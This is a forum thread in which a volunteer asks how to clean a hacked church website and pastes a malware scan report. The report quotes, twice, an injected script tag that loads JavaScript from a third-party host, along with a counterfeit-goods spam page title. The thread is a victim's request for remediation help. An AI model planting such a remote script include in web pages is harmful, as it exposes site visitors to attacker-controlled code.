Author Topic: Church website hacked.  (Read 4516 times)

0 Members and 1 Guest are viewing this topic.

Offline mikrose2

  • Newbie
  • *
  • Posts: 5
Church website hacked.
« on: May 10, 2015, 05:57:22 PM »
Hi.  I've just inherited a hacked website for our church and am attempting to repair it with little experience!  I do repair computers and have a working knowledge of editing and uploading info to a website, but need some direction.  Macbook Pro 10.9.5, Sandvox 2.1, Transit FTP.
We were using File Zilla when the hack occurred.
The person who built the site and maintained it for several years clicked on a Adobe Flash Update fake link and that started the problems.
I scanned for Malware and Virus with Sophos, Webroot after this happened but we still had intermittent issues on selected computers in the office and from church members at home.
I alerted Cox Communications 5/9/15 and they verified the hack and shut our site down.  They said the hack was using our site to sell counterfeit items and drugs.
Now I'm supposed to clean our website files of the hacks before they can put us back on the web.
I used Sucuri and it yielded the included results.  I am uncertain what steps to take with my limited experience with this type of problem.  Suggestions welcome. (I've used Avast for years on home computers.)

Website:
risen-savior.org
Status:
Infected With Malware. Immediate Action is Required.
Web Trust:
Not Currently Blacklisted (10 Blacklists Checked)
Scan
Result
Severity
Recommendation
Malware
Detected
Critical
Get Your Site Cleaned
ISSUE DETECTED
DEFINITION
INFECTED URL
Website Malware
8malware-entry-mwanomalysp
http://risen-savior.org ( View Payload )
Website Malware
malware-entry-mwanomalysp8
http://risen-savior.org/about/calendar-google.html ( View Payload )
SEO Spam
MW:SPAM:SEO?v011
http://risen-savior.org ( View Payload )
Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Known Spam detected. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?v011
<title>Cheap Air Jordan 11 Hoyas For Sale,Retro Low Georgetown Hoyas 11s Full Size</title>

Offline Asyn

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 71894
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Church website hacked.
« Reply #1 on: May 10, 2015, 06:05:14 PM »
Win 8.1 [x64] - Avast PremSec 21.9.6605.IBC [UI.666] - EEK - Firefox ESR 78.14 [NS/uBO/PB] - TB 91.1.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline mikrose2

  • Newbie
  • *
  • Posts: 5
Re: Church website hacked.
« Reply #2 on: May 10, 2015, 08:00:46 PM »
Thank you, I did what you suggested.

Offline Asyn

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 71894
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Church website hacked.
« Reply #3 on: May 11, 2015, 07:19:23 AM »
You're welcome.
Win 8.1 [x64] - Avast PremSec 21.9.6605.IBC [UI.666] - EEK - Firefox ESR 78.14 [NS/uBO/PB] - TB 91.1.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0